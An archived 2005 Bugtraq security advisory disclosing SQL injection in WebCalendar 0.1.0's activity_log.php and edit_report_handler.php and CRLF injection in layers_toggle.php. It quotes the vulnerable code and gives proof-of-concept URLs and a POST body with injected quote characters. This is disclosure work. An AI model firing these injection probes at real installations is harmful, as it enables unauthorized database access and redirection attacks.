WebCalendar Multiple Vulnerabilities.

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: WebCalendar Multiple Vulnerabilities.
From: lwang@xxxxxxxxx
Date: 1 Dec 2005 12:06:23 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

WebCalendar Multiple Vulnerabilities.

Author: lwang (lwang at lwang.org)

Publish Date: 2005-12-1

Description:
WebCalendar is a PHP application used to maintain a calendar for one or more 
persons and for a variety of purposes.  
In WebCalendar 0.1.0, activity_log.php and edit_report_handler.php are prone to 
SQL Injection attack, layers_toggle.php is vulnerable to CRLF Injection.

Reference: 
http://vd.lwang.org/webcalendar_multiple_vulns.txt

Vulnerability Analysis and Proof of Concept:
1. SQL Injection
        in activity_log.php, parameter $startid does not validation.
        if ( ! empty ( $startid ) )
        $sql .= "AND webcal_entry_log.cal_log_id <= $startid ";
        PoC:
        http://victimhost/webcalendar/activity_log.php?startid=%2527
        http://victimhost/webcalendar/activity_log.php?startid=%27
        http://victimhost/webcalendar/activity_log.php?startid='
        
        in edit_report_handler.php
        PoC:
        POST the following variable to 
http://victimhost/webcalendar/edit_report_handler.php
        
report_name=Unnamed%20Report&is_global=Y&show_in_trailer=Y&include_header=Y&time_range='&cat_id=1&allow_nav=Y&include_empty=Y&page_template=%26lt%3Bdl%26gt%3B%24%7Bdays%7D%26lt%3B%2Fdl%26gt%3B&day_template=%26lt%3Bdt%26gt%3B%26lt%3Bb%26gt%3B%24%7Bdate%7D%26lt%3B%2Fb%26gt%3B%26lt%3B%2Fdt%26gt%3B%0A%26lt%3Bdd%26gt%3B%26lt%3Bdl%26gt%3B%24%7Bevents%7D%26lt%3B%2Fdl%26gt%3B%26lt%3B%2Fdd%26gt%3B&event_template=%26lt%3Bdt%26gt%3B%24%7Bname%7D%26lt%3B%2Fdt%26gt%3B%0A%26lt%3Bdd%26gt%3B%26lt%3Bb%26gt%3BDate%3A%26lt%3B%2Fb%26gt%3B%20%24%7Bdate%7D%26lt%3Bbr%20%2F%26gt%3B%0A%26lt%3Bb%26gt%3BTime%3A%26lt%3B%2Fb%26gt%3B%20%24%7Btime%7D%26lt%3Bbr%20%2F%26gt%3B%0A%24%7Bdescription%7D%26lt%3B%2Fdd%26gt%3B

2. CRLF Injection
        in layers_toggle.php, parameter $ret does not validation.
        if ( empty ( $error ) ) {
        // Go back to where we where if we can figure it out.
        if ( strlen ( $ret ) )
        do_redirect ( $ret );
        else if ( ! empty ( $HTTP_REFERER ) )
        do_redirect ( $HTTP_REFERER );
        else
        send_to_preferred_view ();
        
        PoC:
        
http://victimhost/webcalendar/layers_toggle.php?status=on&ret=[url_redirect_to]

Prev by Date: [security bulletin] SSRT4787 Revised - HP Systems Insight Manager (SIM) for HP-UX Remote Denial of Service (DoS)
Next by Date: Microsoft Windows CreateRemoteThread Exploit
Previous by thread: [security bulletin] SSRT4787 Revised - HP Systems Insight Manager (SIM) for HP-UX Remote Denial of Service (DoS)
Next by thread: Microsoft Windows CreateRemoteThread Exploit
Index(es):
- Date
- Thread